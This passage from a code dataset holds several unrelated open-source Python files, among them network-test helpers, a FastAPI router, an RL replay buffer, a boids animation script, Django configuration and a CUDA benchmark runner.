If not specified will verify all\r\n preference ('int'): Preference path\r\n\r\n Returns:\r\n accumulated_metric (None, 'int'): Accumulated path metric\r\n\r\n Raises:\r\n N/A\r\n \"\"\"\r\n if policy_name:\r\n cmd = 'show segment-routing traffic-eng policy name {policy}'.format(policy=policy_name)\r\n else:\r\n cmd = 'show segment-routing traffic-eng policy all'\r\n \r\n try:\r\n out = device.parse(cmd)\r\n except SchemaEmptyParserError:\r\n return None\r\n \r\n for policy in out:\r\n for preference_found in out[policy].get('candidate_paths', {}).get('preference', {}):\r\n if preference != preference_found:\r\n continue\r\n if out[policy]['candidate_paths']['preference'][preference].get('path_type'):\r\n path_type_dict = out[policy]['candidate_paths']['preference'][preference]['path_type']\r\n if 'dynamic' in path_type_dict:\r\n accumulated_metric = path_type_dict['dynamic'].get('path_accumulated_metric', '')\r\n return accumulated_metric\r\n return None\r\n\r\ndef get_segment_routing_labels_from_bgp(device, route, vrf, best_path=False):\r\n \"\"\" Gets segement-routing labels from bgp table\r\n\r\n Args:\r\n device (`obj`): device to use\r\n route (`str`): route to check\r\n vrf (`vrf`): VRF name\r\n best_path (`bool`): only best path returned\r\n\r\n Returns:\r\n ('list'): list of segment routing labels\r\n\r\n Raises:\r\n N/A\r\n \"\"\"\r\n\r\n # search destination's endpoint and color by \r\n # show ip bgp vpnv4 vrf <vrf> <destination address>\r\n\r\n endpoint_color_list = device.api.get_ip_bgp_route_nexthop_color(\r\n address_family='vpnv4', route=route, vrf=vrf, best_path=True)\r\n \r\n # get policy names based on endpoint and color\r\n policy_list = []\r\n label_list = []\r\n if endpoint_color_list:\r\n log.info('Found endpoint and color: {}'.format(\r\n endpoint_color_list))\r\n for endpoint, color in endpoint_color_list:\r\n policy = device.api.get_segment_routing_policy_in_state(\r\n expected_admin='up', expected_oper='up',\r\n expected_color=color, expected_endpoint=endpoint)\r\n # don't have redundant policy\r\n if policy not in policy_list:\r\n policy_list.append(policy)\r\n if policy_list:\r\n log.info('Policy Found: {}'.format(policy_list))\r\n for policy in policy_list:\r\n label_list = device.api.\\\r\n get_segment_routing_policy_active_path_hop_labels(\r\n policy=policy, ignore_first_label=True)\r\n\r\n return label_list\r\n","repo_name":"CiscoTestAutomation/genielibs","sub_path":"pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/segment_routing/get.py","file_name":"get.py","file_ext":"py","file_size_in_byte":10585,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"16"} +{"seq_id":"14500229895","text":"\"\"\"\nItem routes\n\"\"\"\n\nfrom fastapi import APIRouter, Depends, HTTPException\nfrom sqlalchemy.orm import Session\n\nfrom app.schemas.item import ItemSchema, ItemCreateSchema, ItemUpdateSchema\nfrom app.api.v1.dependencies import get_db\nfrom app.crud import item as crud\n\n\nrouter = APIRouter()\n\n\n@router.get('/', response_model=list[ItemSchema])\ndef read_all(db: Session = Depends(get_db)):\n \"\"\"Read items\"\"\"\n return crud.get_items(db)\n\n\n@router.get('/{item_id}', response_model=ItemSchema)\ndef read_one(item_id: int, db: Session = Depends(get_db)):\n \"\"\"Get item by id\"\"\"\n item = crud.get_item_by_id(item_id=item_id, db=db)\n if item is None:\n raise HTTPException(status_code=404)\n else:\n return item\n\n\n@router.put('/{item_id}', response_model=ItemSchema)\ndef update(item_id: int, item: ItemUpdateSchema, 
db: Session = Depends(get_db)):\n \"\"\"Update item\"\"\"\n item = crud.update_item(db, item_id, item)\n if item is None:\n raise HTTPException(status_code=404)\n else:\n return item\n\n\n@router.post('/', response_model=ItemSchema)\ndef create(item: ItemCreateSchema, db: Session = Depends(get_db)):\n \"\"\"Create new item\"\"\"\n return crud.create_item(db, item)\n\n\n@router.delete('/{item_id}')\ndef delete(item_id: int, db: Session = Depends(get_db)):\n \"\"\"Delete item\"\"\"\n response = crud.disable_item(db, item_id)\n if response is None:\n raise HTTPException(status_code=404)\n","repo_name":"beerman17/dragonroll-gameserver","sub_path":"app/api/v1/endpoints/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6067989024","text":"import json\nimport logging\nimport os\nimport numpy as np\n\nfrom gym.utils import atomic_write\nfrom rltf.utils import rltf_conf\nfrom rltf.utils import seeding\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass BaseBuffer():\n \"\"\"Abstract buffer that saves agent experience. Supports both image and low-dimensional observations.\n Very memory efficient implementation in the case of images.\"\"\"\n\n def __init__(self, size, state_shape, obs_dtype, act_shape, act_dtype, obs_len):\n \"\"\"\n Args:\n state_shape: tuple or list. Shape of what is consedered to be a single state (not observation).\n For example, for DQN this should be `[84, 84, 4]` because a state is comprised of the last 4\n frames (observations).\n obs_dtype: np.dtype. Type of the observation data\n act_shape: tuple or list. Shape of the action space\n act_dtype: np.dtype. Type of the action data\n obs_len: int, `>= 1`. The number of observations that comprise a state. If `obs_len=1`,\n then `obs_shape == state_shape`. Must equal 1 for low-dimensional observations.\n If `obs_len>=1`, then observations must be images. In this case, states are comprised of\n stacked consecutive observations (images) and `obs_shape[-1] == state_shape[-1] / obs_len`.\n In this case the buffer stores observations separately and automatically reconstructs the\n full states when queried. 
Corresponds to the order of the MDP.\n \"\"\"\n\n # Compute the observation shape\n obs_shape = self._get_obs_shape(state_shape, obs_len, obs_dtype)\n\n self.obs_shape = list(obs_shape) # observation shape (NOT state shape!)\n self.act_shape = list(act_shape)\n self.obs_len = obs_len\n\n self.max_size = int(size)\n self.size_now = 0\n self.next_idx = 0\n # self.new_idx = 0\n\n # Create the buffers\n self.obs = np.empty([self.max_size] + self.obs_shape, dtype=obs_dtype)\n self.action = np.empty([self.max_size] + self.act_shape, dtype=act_dtype)\n self.reward = np.empty([self.max_size], dtype=np.float32)\n self.done = np.empty([self.max_size], dtype=np.bool)\n\n self.prng = seeding.get_prng()\n\n\n @staticmethod\n def _get_obs_shape(state_shape, obs_len, obs_dtype):\n \"\"\"Compute the shape of a single observation (not state)\"\"\"\n\n assert isinstance(obs_len, int) and obs_len >= 1\n\n # Only image observations support stacking observations\n if obs_len > 1:\n assert len(state_shape) == 3\n # Make sure that the type of the observation is np.uint8 for images\n if len(state_shape) == 3:\n assert obs_dtype == np.uint8\n\n # Images assume that the last dimension of the shape is the channel dimension\n if obs_len > 1 and len(state_shape) == 3:\n assert state_shape[-1] % obs_len == 0\n obs_shape = list(state_shape)\n obs_shape[-1] = int(obs_shape[-1]/obs_len)\n else:\n obs_shape = state_shape\n\n return obs_shape\n\n\n def store(self, obs_t, act_t, rew_tp1, done_tp1):\n \"\"\"Store an observed transition. If `obs_len>1`, the next call to this function must be with\n the observation after taking `act_t`, otherwise, reconstructed state will be incorrect.\n If `done_tp1 == True`, then `store()` should not be called with `obs_tp1`, since the agent\n does not need it for computing the return\n Args:\n obs_t: `np.array`, of shape `state_shape`. If `obs_len>1`, the observation is automatically\n extracted and stored instead of storing duplicate data.\n act_t: `np.array`, of shape `act_shape` or `float`. Action taken when `obs_t` was observed\n reward_tp1: `float`. Reward obtained on executing `act_t` in state `obs_t`\n done_tp1: `bool`. 
True if episode terminated on executing `act_t` in state `obs_t`.\n \"\"\"\n\n # To avoid storing the same data several times, if obs_len > 1, then store only the last\n # observation from the stack of observations that comprise a state\n if self.obs_len > 1:\n self.obs[self.next_idx] = obs_t[:, :, -self.obs_shape[-1]:]\n else:\n self.obs[self.next_idx] = obs_t\n\n self.action[self.next_idx] = act_t\n self.reward[self.next_idx] = rew_tp1\n self.done[self.next_idx] = done_tp1\n\n self.next_idx = (self.next_idx + 1) % self.max_size\n self.size_now = min(self.max_size, self.size_now + 1)\n\n\n def _encode_img_observation(self, idx):\n \"\"\"Encode the observation for idx by stacking the `obs_len` preceding frames together.\n Assume there are more than `obs_len` frames in the buffer.\n NOTE: Used only for image observations\n \"\"\"\n hi = idx + 1 # make noninclusive\n lo = hi - self.obs_len\n\n for i in range(lo, hi - 1):\n if self.done[i % self.max_size]:\n lo = i + 1\n missing = self.obs_len - (hi - lo)\n\n # We need to duplicate the lo observation\n if missing > 0:\n frames = [self.obs[lo % self.max_size] for _ in range(missing)]\n for i in range(lo, hi):\n frames.append(self.obs[i % self.max_size])\n return np.concatenate(frames, 2)\n # We are on the boundary of the buffer\n elif lo < 0:\n img_h, img_w = self.obs.shape[1], self.obs.shape[2]\n frames = [self.obs[lo:], self.obs[:hi]]\n frames = np.concatenate(frames, 0)\n return frames.transpose(1, 2, 0, 3).reshape(img_h, img_w, -1)\n # The standard case\n else:\n # This optimization can save about 30% compute time\n img_h, img_w = self.obs.shape[1], self.obs.shape[2]\n return self.obs[lo:hi].transpose(1, 2, 0, 3).reshape(img_h, img_w, -1)\n\n\n def sample(self, batch_size):\n raise NotImplementedError()\n\n\n def new_data(self, batch_size=32):\n \"\"\"Yields the new data which was stored since the last call to this function.\n Args:\n batch_size: int. Size of a single yielded batch. Can be smaller than specified if not enough data\n Returns:\n python generator; has the same signature as `sample()`\n \"\"\"\n raise NotImplementedError()\n\n\n def all_data(self, batch_size=32):\n \"\"\"Yields all data in the buffer\n Args:\n batch_size: int. Size of a single yielded batch. Can be smaller than specified if not enough data\n Returns:\n python generator which should be iterated; has the same signature as `sample()`\n \"\"\"\n raise NotImplementedError()\n\n\n def recent_data(self, size, batch_size=32):\n \"\"\"Yields the most recent `size` number of examples in the buffer\n Args:\n size: int. Total number of data points to generate\n batch_size: int. Size of a single yielded batch. 
Can be smaller than specified if not enough data\n Returns:\n python generator which should be iterated; has the same signature as `sample()`\n \"\"\"\n raise NotImplementedError()\n\n\n def save(self, model_dir):\n \"\"\"Store the data to disk\n Args:\n model_dir: Full path of the directory to save the buffer\n \"\"\"\n save_dir = os.path.join(model_dir, \"buffer\")\n state_file = os.path.join(save_dir, \"state.json\")\n\n if not os.path.exists(save_dir):\n # Create symlink to store buffer if $RLTFBUF is defined\n if 'RLTFBUF' in os.environ:\n # split = os.path.split(os.path.normpath(model_dir))\n # envdir = split[1]\n # model = os.path.split(split[0])\n # store_dir = os.path.join(os.environ['RLTFBUF'], os.path.join(model, envdir))\n mdir = os.path.relpath(model_dir, rltf_conf.MODELS_DIR)\n store_dir = os.path.join(os.environ['RLTFBUF'], mdir)\n\n store_dir = os.path.join(store_dir, \"buffer\")\n if not os.path.exists(store_dir):\n os.makedirs(store_dir)\n os.symlink(store_dir, save_dir)\n # Store the buffer directly in the folder\n else:\n os.makedirs(save_dir)\n\n np.save(os.path.join(save_dir, \"obs.npy\"), self.obs[:self.size_now])\n np.save(os.path.join(save_dir, \"act.npy\"), self.action[:self.size_now])\n np.save(os.path.join(save_dir, \"rew.npy\"), self.reward[:self.size_now])\n np.save(os.path.join(save_dir, \"done.npy\"), self.done[:self.size_now])\n\n data = {\n \"size_now\": self.size_now,\n \"next_idx\": self.next_idx,\n # \"new_idx\": self.new_idx,\n }\n\n with atomic_write.atomic_write(state_file) as f:\n json.dump(data, f, indent=4, sort_keys=True)\n\n\n def restore(self, model_dir):\n \"\"\"Populate the buffer from data previously saved to disk\n Args:\n model_dir: Full path of the directory of the data\n \"\"\"\n save_dir = os.path.join(model_dir, \"buffer\")\n state_file = os.path.join(save_dir, \"state.json\")\n\n if not os.path.exists(save_dir):\n return logger.warning(\"BaseBuffer not saved and cannot resume. Continuing with empty buffer.\")\n\n with open(state_file, 'r') as f:\n data = json.load(f)\n\n self.size_now = data[\"size_now\"]\n self.next_idx = data[\"next_idx\"]\n # self.new_idx = data[\"new_idx\"]\n\n obs = np.load(os.path.join(save_dir, \"obs.npy\"))\n action = np.load(os.path.join(save_dir, \"act.npy\"))\n done = np.load(os.path.join(save_dir, \"done.npy\"))\n reward = np.load(os.path.join(save_dir, \"rew.npy\"))\n\n assert len(obs) == len(action) == len(reward) == len(done) == self.size_now\n assert self.obs.shape[1:] == obs.shape[1:]\n assert self.action.shape[1:] == action.shape[1:]\n assert self.reward.shape[1:] == reward.shape[1:]\n assert self.done.shape[1:] == done.shape[1:]\n\n self.obs[:self.size_now] = obs\n self.action[:self.size_now] = action\n self.reward[:self.size_now] = reward\n self.done[:self.size_now] = done\n\n\n def _sample_n_unique(self, n, lo, hi, exclude=None):\n \"\"\"Sample n unique indices in the range [lo, hi), making sure no sample appreas in `exclude`\n Args:\n n: int. Number of samples to take\n lo: int. Lower boundary of the sample range; inclusive\n hi: int. Upper boundary of the sample range; exclusive\n exclude: list or np.array. 
Contains values that samples must not take\n Returns:\n np.array of the sampled indices\n \"\"\"\n\n batch = np.empty(n, dtype=np.uint32)\n k = 0\n\n while k < n:\n samples = self.prng.randint(lo, hi, n-k)\n # Get only the unique entries\n samples = np.unique(samples)\n # Get only the entries which are not in exclude\n if exclude is not None:\n valid = np.all(samples[:, None] != exclude, axis=-1)\n samples = samples[valid]\n # Update batch\n end = min(k + samples.shape[0], n)\n batch[k:end] = samples\n k = end\n\n return batch\n\n\n def reset(self):\n self.size_now = 0\n self.next_idx = 0\n # self.new_idx = 0\n\n\n @property\n def size(self):\n return self.max_size\n\n\n def __len__(self):\n return self.size_now\n","repo_name":"nikonikolov/rltf","sub_path":"rltf/memory/base_buffer.py","file_name":"base_buffer.py","file_ext":"py","file_size_in_byte":10664,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"16"} +{"seq_id":"7421855452","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\n\nimport s2v_encoder\n\nFLAGS = tf.flags.FLAGS\n\n\nclass EncoderManager(object):\n \"\"\"Manager class for loading and encoding with skip-thoughts models.\"\"\"\n\n def __init__(self):\n self.encoders = []\n self.sessions = []\n\n def load_model(self, model_config):\n \"\"\"Loads a skip-thoughts model.\n\n Args:\n model_config: Object containing parameters for building the model.\n vocabulary_file: Path to vocabulary file containing a list of newline-\n separated words where the word id is the corresponding 0-based index in\n the file.\n embedding_matrix_file: Path to a serialized numpy array of shape\n [vocab_size, embedding_dim].\n checkpoint_path: SkipThoughtsModel checkpoint file or a directory\n containing a checkpoint file.\n \"\"\"\n\n g = tf.Graph()\n with g.as_default():\n encoder = s2v_encoder.s2v_encoder(model_config)\n restore_model = encoder.build_graph_from_config(model_config)\n\n sess = tf.Session(graph=g)\n\n restore_model(sess)\n\n self.encoders.append(encoder)\n self.sessions.append(sess)\n\n def encode(self,\n data,\n use_norm=True,\n verbose=False,\n batch_size=128,\n use_eos=False):\n \"\"\"Encodes a sequence of sentences as skip-thought vectors.\n\n Args:\n data: A list of input strings.\n use_norm: If True, normalize output skip-thought vectors to unit L2 norm.\n verbose: Whether to log every batch.\n batch_size: Batch size for the RNN encoders.\n use_eos: If True, append the end-of-sentence word to each input sentence.\n\n Returns:\n thought_vectors: A list of numpy arrays corresponding to 'data'.\n\n Raises:\n ValueError: If called before calling load_encoder.\n \"\"\"\n if not self.encoders:\n raise ValueError(\n \"Must call load_model at least once before calling encode.\")\n\n encoded = []\n for encoder, sess in zip(self.encoders, self.sessions):\n encoded.append(\n np.array(\n encoder.encode(\n sess,\n data,\n use_norm=use_norm,\n verbose=verbose,\n batch_size=batch_size,\n use_eos=use_eos)))\n\n return np.concatenate(encoded, axis=1)\n\n def close(self):\n \"\"\"Closes the active TensorFlow Sessions.\"\"\"\n for sess in self.sessions:\n sess.close()\n","repo_name":"lajanugen/S2V","sub_path":"src/encoder_manager.py","file_name":"encoder_manager.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","stars":205,"dataset":"github-code","pt":"16"} 
+{"seq_id":"7130006501","text":"#!/usr/bin/env python3\n\n\"\"\"\nScript to produce visualisation of boid movement from dumped position data\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport configparser, csv, numpy as np, os, sys\n\nfrom fast_boids import quick_norm\n\nfrom boids import *\n\nif len(sys.argv) < 2:\n path = '.'\nelse:\n path = sys.argv[1]\n\nconfig = configparser.ConfigParser()\nif os.path.isdir(path):\n config.read(os.path.join(path, 'config.ini'))\n config['DEFAULT']['data_dir'] = os.path.abspath(path)\nelse:\n config.read(path)\n config['DEFAULT']['data_dir'] = os.path.abspath(os.path.dirname(path))\n\nWORLD_RADIUS = eval(config['DEFAULT']['world_radius'])\nDUMP_STATS_INTERVAL = eval(config['DEFAULT']['dump_stats_interval'])\nDT = eval(config['DEFAULT']['dt'])\n\nPREY_RADIUS = eval(config['Prey']['boid_radius'])\nPREDATOR_RADIUS = eval(config['Predator']['boid_radius'])\n\nFRAME_INTERVAL = eval(config['Visualisation']['frame_interval'])\nEVERY_NTH_FRAME = eval(config['Visualisation']['every_nth_frame'])\nSTART_AT_T = eval(config['Visualisation']['start_at_t'])\nSTOP_AT_T = eval(config['Visualisation']['stop_at_t'])\n\nDATA_DIR = config['DEFAULT']['data_dir']\n\nPLOT_MINIMUM = -1.01*WORLD_RADIUS\nPLOT_MAXIMUM = 1.01*WORLD_RADIUS\n\nfeeding_area_helper = FeedingAreaConfigurations()\nfeeding_area_config = eval(config['DEFAULT']['feeding_areas'])\nif isinstance(feeding_area_config, tuple):\n FEEDING_AREA_LOCATIONS, FEEDING_AREA_RADIUS = feeding_area_config\nelse:\n FEEDING_AREA_LOCATIONS, FEEDING_AREA_RADIUS = feeding_area_helper.get_info(\n feeding_area_config)\n\ndef animate(i, fig, ax, text,\n prey_graph, prey_quivers,\n predator_graph, predator_quivers,\n prey_pos_data, prey_vel_data,\n predator_pos_data, predator_vel_data):\n text.set_text(\"t = %d\" % (i*(DUMP_STATS_INTERVAL*DT*EVERY_NTH_FRAME)\n + START_AT_T))\n u = [u[0]/quick_norm(np.array(u)) for u in prey_vel_data[i]]\n v = [u[1]/quick_norm(np.array(u)) for u in prey_vel_data[i]]\n prey_quivers.set_offsets(prey_pos_data[i])\n prey_quivers.set_UVC(u, v)\n prey_graph.set_offsets(prey_pos_data[i])\n u = [u[0]/quick_norm(np.array(u)) for u in predator_vel_data[i]]\n v = [u[1]/quick_norm(np.array(u)) for u in predator_vel_data[i]]\n predator_quivers.set_offsets(predator_pos_data[i])\n predator_quivers.set_UVC(u, v)\n predator_graph.set_offsets(predator_pos_data[i])\n return [text, prey_graph, predator_graph]\n\ndef collect_data(csv_reader):\n frame_data = []\n i = 0\n for row in csv_reader:\n if i % EVERY_NTH_FRAME:\n i += 1\n continue\n if i*DUMP_STATS_INTERVAL*DT < START_AT_T:\n i += 1\n continue\n if i*DUMP_STATS_INTERVAL*DT > STOP_AT_T:\n break\n positions = np.array(list(map(lambda x: float(x), row)))\n num_boids = positions.size / 2\n positions = positions.reshape(num_boids, 2)\n data = []\n for boid in positions:\n data.append((boid[0], boid[1]))\n frame_data.append(data)\n i += 1\n return frame_data\n\nprey_pos_reader = csv.reader(open(os.path.join(DATA_DIR, 'prey_positions.csv')))\nprey_vel_reader = csv.reader(open(os.path.join(DATA_DIR, 'prey_velocities.csv')))\npredator_pos_reader = csv.reader(open(os.path.join(DATA_DIR, 'predator_positions.csv')))\npredator_vel_reader = csv.reader(open(os.path.join(DATA_DIR, 'predator_velocities.csv')))\n\nprey_pos_data = collect_data(prey_pos_reader)\nprey_vel_data = collect_data(prey_vel_reader)\npredator_pos_data = collect_data(predator_pos_reader)\npredator_vel_data = collect_data(predator_vel_reader)\n\nfig, ax = 
plt.subplots()\nboundary = plt.Circle((0, 0), WORLD_RADIUS, facecolor='none',\n linestyle='dashed')\nax.add_artist(boundary)\n\nfor location in FEEDING_AREA_LOCATIONS:\n feeding_plot = plt.Circle(tuple(location), FEEDING_AREA_RADIUS, facecolor='green', linestyle='dashed', alpha=0.3)\n ax.add_artist(feeding_plot)\n\ntext = ax.text(PLOT_MINIMUM+5, PLOT_MAXIMUM-20, \"\", withdash=True, fontsize=12)\n\nprey_graph = ax.scatter(100*PLOT_MINIMUM, 100*PLOT_MAXIMUM,\n 1.2*np.pi*PREY_RADIUS**2, facecolor='white', alpha=0.8,\n edgecolor='black', linewidth=1)\nprey_quivers = ax.quiver([], [], width=0.5, units='dots', scale=0.08)\npredator_graph = ax.scatter(100*PLOT_MINIMUM, 100*PLOT_MAXIMUM,\n 1.2*np.pi*PREDATOR_RADIUS**2, facecolor='red', alpha=0.8,\n edgecolor='black', linewidth=1)\npredator_quivers = ax.quiver([], [], width=0.5, units='dots', scale=0.08)\nax.set_xlim(PLOT_MINIMUM, PLOT_MAXIMUM)\nax.set_ylim(PLOT_MINIMUM, PLOT_MAXIMUM)\n\nani = animation.FuncAnimation(fig, animate, len(prey_pos_data),\n fargs=(fig, ax, text,\n prey_graph, prey_quivers,\n predator_graph, predator_quivers,\n prey_pos_data, prey_vel_data,\n predator_pos_data, predator_vel_data),\n interval=FRAME_INTERVAL,\n repeat=True)\nplt.show()\n\n","repo_name":"tsmithe/adaptive-boids","sub_path":"visualise.py","file_name":"visualise.py","file_ext":"py","file_size_in_byte":5236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12036601375","text":"from django import forms\nfrom .models import Blog\n\n\nclass BlogForm(forms.ModelForm):\n class Meta:\n model = Blog\n fields = ('title', 'description', 'blog_pic')\n widgets = {\n\n 'title': forms.TextInput(attrs={'class': 'form-control row mb-3', 'placeholder': 'Title'}),\n 'description': forms.TextInput(attrs={'class': 'form-control row mb-3', 'placeholder': 'Description'})\n\n\n }\n\n labels = {\"title\": \"Title\", \"description\": \"Description\",\n 'blog_pic': 'Profile Picture'}\n","repo_name":"FatihG34/Second_Django_Project","sub_path":"blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38098136446","text":"from django.conf.urls import patterns, include, url\nfrom django.conf.urls.i18n import i18n_patterns\nfrom django.utils.translation import ugettext_lazy as _\nfrom sitemaps import ViewSitemap\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nsitemaps = {\n 'views_sitemap': ViewSitemap,\n}\n\nurlpatterns = patterns('',\n# url(r'^404$', 'info.views.page_not_found', name='page_not_found'),\n # Translation\n (r'^i18n/', include('django.conf.urls.i18n')),\n (r'^sitemap\\.xml$', 'django.contrib.sitemaps.views.sitemap', {\n 'sitemaps': sitemaps,\n 'template_name': 'info/custom_sitemap.html'},),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n\n # Albums\n url(_(r'^albums$'), 'info.views.albums', name='albums'),\n\n # Facebook all auth\n (r'^accounts/', include('allauth.urls')),\n\n)\n\nurlpatterns += i18n_patterns('',\n url(_(r'^$'), 'info.views.home', name='home'),\n url(_(r'^bicycle-touring$'), 'info.views.bicycle_touring', name='bicycle-touring'),\n url(_(r'^boom-festival$'), 'info.views.boom_festival', name='boom-festival'),\n 
url(_(r'^boom-and-bike$'), 'info.views.boom_and_bike', name='boom-and-bike'),\n url(_(r'^get-there$'), 'info.views.get_there', name='get-there'),\n url(_(r'^together$'), 'info.views.together', name='together'),\n url(_(r'^get-there$'), 'info.views.get_there', name='get-there'),\n url(_(r'^city_visit/(?P<location>.+)$'), 'info.views.city_visit', name='city_visit'),\n url(_(r'^user_checkpoints/(?P<id>[0-9]+)$'), 'info.views.user_checkpoints', name='user_checkpoints'),\n)\n\n#urlpatterns += patterns('django.contrib.auth.views',\n# (_(r'^accounts/login/$'), 'login'),\n# (_(r'^accounts/logout/$'), 'logout'),\n#)\n\nhandler404 = 'info.views.page_not_found'\n","repo_name":"qcaron/boombike","sub_path":"boombike/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71742442889","text":"def find(parent, x):\n if parent[x] != x:\n parent[x] = find(parent, parent[x])\n return parent[x]\n\n\ndef union(parent, a, b):\n a = find(parent, a)\n b = find(parent, b)\n\n if a < b:\n parent[b] = a\n else:\n parent[a] = b\n\nn ,m = map(int, input().split())\noperations = []\nparent = [i for i in range(m+1)]\n\nfor _ in range(m):\n oper, a, b = map(int, input().split())\n operations.append((oper, a, b))\n\n\nfor operation in operations:\n oper, a, b = operation\n if oper == 0:\n union(parent, a, b)\n if oper == 1:\n if find(parent, a) == find(parent, b):\n print(\"YES\")\n else:\n print(\"NO\")\n \n\n# 7 8\n# 0 1 3\n# 1 1 7\n# 0 7 6\n# 1 7 1\n# 0 3 7\n# 0 4 2\n# 0 1 1\n# 1 1 1","repo_name":"rbgksqkr/TIL","sub_path":"이코테/8. 그래프/ex_make_team.py","file_name":"ex_make_team.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29910852538","text":"import argparse\n\nimport pandas as pd\nimport os\nimport subprocess\n\n\ndef run_one_run(mesh_size: int):\n bin_file = os.path.dirname(os.path.abspath(__file__)) + \"/../bin/cfdARCO\"\n\n time_microseconds_cudas = []\n time_microseconds_parallels = []\n\n for q in range(5):\n command_cuda = [bin_file, \"-L\", str(mesh_size), \"-d\", \"ln\", \"-t\", \"300\", \"-c\"]\n result_cuda = subprocess.run(command_cuda, capture_output=True, text=True)\n outs_cuda = result_cuda.stdout\n\n time_str_cuda = outs_cuda.split(\"\\n\")[-2].split(\" \")[-1].split(\"[\")[0]\n time_microseconds_cuda = int(time_str_cuda)\n time_microseconds_cudas.append(time_microseconds_cuda)\n\n for q in range(5):\n # command_parallel = [\"mpirun\", \"-n\", \"8\", bin_file, \"--skip_history\", \"-L\", str(mesh_size), \"-d\", \"ln\", \"-t\", \"300\"]\n # result_parallel = subprocess.run(command_parallel, capture_output=True, text=True)\n # outs_parallel = result_parallel.stdout\n\n # time_str_parallel = outs_parallel.split(\"\\n\")[-2].split(\" \")[-1].split(\"[\")[0]\n # time_microseconds_parallel = int(time_str_parallel)\n # time_microseconds_parallels.append(time_microseconds_parallel)\n time_microseconds_parallels.append(0)\n\n # print(f\"Res(mesh_size={mesh_size}) = cuda - {min(time_microseconds_cudas)} parallel - {min(time_microseconds_parallels)}\")\n print(f\"Res(mesh_size={mesh_size}) = cuda - {min(time_microseconds_cudas)} parallel - \")\n\n return time_microseconds_cudas, time_microseconds_parallels\n\n\ndef generate_report(mesh_sizes, output_file=\"report_cuda.csv\"):\n times_microseconds_cuda = []\n times_microseconds_parallel = []\n mesh_sizes_df = []\n for mesh_size in 
mesh_sizes:\n time_cur_cudas, time_cur_parallels = run_one_run(mesh_size)\n for time_cur_cuda, time_cur_parallel in zip(time_cur_cudas, time_cur_parallels):\n mesh_sizes_df.append(mesh_size)\n times_microseconds_cuda.append(time_cur_cuda)\n times_microseconds_parallel.append(time_cur_parallel)\n print(time_cur_cuda, time_cur_parallel)\n\n df_dict = {\"mesh_sizes\": mesh_sizes_df, \"times_microseconds_cuda\": times_microseconds_cuda,\n \"times_microseconds_parallel\": times_microseconds_parallel}\n df = pd.DataFrame(df_dict)\n df.to_csv(output_file)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(prog='cfdARCHO bench')\n parser.add_argument('-mf', '--mesh_size_from', required=False, type=int)\n parser.add_argument('-mt', '--mesh_size_to', required=False, type=int)\n parser.add_argument('-ms', '--mesh_size_step', required=False, type=int)\n parser.add_argument('-m', '--meshes', required=False, nargs='+', type=int)\n parser.add_argument('-o', '--out_file', required=False, default=\"report_cuda_history.csv\")\n\n args = parser.parse_args()\n\n if args.meshes is None:\n mesh_sizes = range(args.mesh_size_from, args.mesh_size_to, args.mesh_size_step)\n else:\n mesh_sizes = args.meshes\n generate_report(list(mesh_sizes), args.out_file)\n\n","repo_name":"yewhenp/cfdARCO","sub_path":"cfdARCO/scripts/test_cuda_execution.py","file_name":"test_cuda_execution.py","file_ext":"py","file_size_in_byte":3067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19487024432","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport numpy as np\nimport pandas as pd\nimport pathlib\n\nfrom utils.utils import rmse_loss, get_bins_from_numerical\nfrom evaluation.performance_metric import marginal_estimands, bivariate_estimands, house_bins\n\n# Load data\nmodel_names = [\"cart\", \"rf\", \"gain\", \"mida\"]\nnum_samples = 100\nnum_imputations = 10\n\nsave_name = \"house\"\nmiss_mechanism = \"MCAR\"\nfile_name = '../data/house_recoded.csv'\ndata_df = pd.read_csv(file_name)\ndata_x = data_df.values.astype(np.float32)\n\nnum_index = list(range(-8, 0))\ncat_index = list(range(-data_df.shape[1], -8))\n\n# Parameters\nno, dim = data_x.shape\n\n# seperate categorical variables and numerical variables\nif cat_index:\n data_cat_pop_df = data_df.iloc[:, cat_index]\n # get all possible levels for categorical variable\n all_levels = [np.unique(x) for x in data_x[:, cat_index].T]\n all_levels_dict = dict(zip(data_df.columns[cat_index], all_levels))\n # population estimands\n mar_Q, mar_Q_var = marginal_estimands(data_cat_pop_df, all_levels_dict)\n biv_Q, biv_Q_var = bivariate_estimands(data_cat_pop_df, all_levels_dict)\n # qualified index\n mar_index = (mar_Q * no > 10) & ((1 - mar_Q) * no > 10)\n biv_index = (biv_Q * no > 10) & ((1 - biv_Q) * no > 10)\n # performance metrics\n mar_qhat = np.empty(shape=(mar_Q.shape[0], num_samples))\n mar_qhat_var = np.empty(shape=(mar_Q_var.shape[0], num_samples))\n biv_qhat = np.empty(shape=(biv_Q.shape[0], num_samples))\n biv_qhat_var = 